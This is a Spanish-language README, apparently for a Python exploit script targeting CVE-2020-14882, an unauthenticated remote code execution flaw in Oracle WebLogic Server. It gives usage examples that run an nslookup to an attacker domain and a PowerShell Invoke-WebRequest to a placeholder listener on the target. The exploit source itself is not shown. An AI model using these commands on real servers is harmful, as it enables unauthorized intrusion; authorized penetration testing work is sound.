
Este script permite la ejecución remota de código (RCE) en Oracle WebLogic Server.
Este script permite la ejecución remota de código (RCE) en Oracle WebLogic Server mediante una solicitud GET no autenticada. Explota la vulnerabilidad CVE-2020-14882. Al ejecutar comandos arbitrarios, un atacante puede obtener acceso no autorizado al servidor.
Asegúrate de tener Python 3 instalado. Para usar este script, sigue los pasos a continuación:
Abre una terminal o símbolo del sistema.
Ejecuta el script usando el siguiente comando:
python3 exploit.py http(s)://target:7001 command
Reemplaza http(s)://target:7001 con la URL objetivo del Oracle WebLogic Server, y command con el comando deseado a ejecutar.
Ejemplo 1:
python3 exploit.py http(s)://target:7001 "nslookup your_Domain"
Este ejemplo ejecuta el comando nslookup your_Domain en el servidor objetivo.
Ejemplo 2:
python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"
Este ejemplo ejecuta el comando de PowerShell Invoke-WebRequest -Uri http://your_listener en el servidor objetivo.
Este script está destinado únicamente a pruebas de penetración autorizadas y fines de investigación de seguridad. El uso no autorizado de este script para explotar sistemas sin el consentimiento adecuado es ilegal y puede acarrear consecuencias legales. Úsalo bajo tu propio riesgo.
Este script requiere las siguientes dependencias:
requestsurllib3Asegúrate de que estas dependencias estén instaladas antes de ejecutar el script.